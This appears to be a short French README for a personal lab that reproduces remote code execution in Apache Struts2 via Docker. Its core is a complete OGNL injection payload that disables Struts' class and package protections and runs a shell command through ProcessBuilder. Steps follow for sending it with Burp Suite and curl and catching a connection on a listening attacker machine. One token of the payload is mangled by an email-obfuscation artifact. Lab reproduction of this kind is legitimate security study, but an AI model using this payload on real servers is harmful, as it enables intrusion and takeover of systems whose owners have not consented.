
RCE project
Une attaque RCE est possible avec la charge utile fournie.
Ce qui suit liste les environnements et outils pour les tests et la validation dans un laboratoire personnel isolé.
En utilisant la commande suivante :
docker compose up -d
Vous pouvez exécuter l'environnement. Ensuite, vous pouvez voir une page de soumission en visitant http://<YOUR_IP>:8080/hello.action.
%{(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
Afin d'exécuter une attaque RCE, il est nécessaire d'utiliser Burp Suite. En utilisant Burp Suite, soumettez la charge utile. Après avoir soumis la charge utile, trouvez le journal correct (POST) et convertissez-le en une commande curl. Enfin, ouvrez votre machine attaquante et écoutez sur le port après avoir envoyé votre commande curl depuis le port d'écoute.
Les zones censurées sont des adresses IP.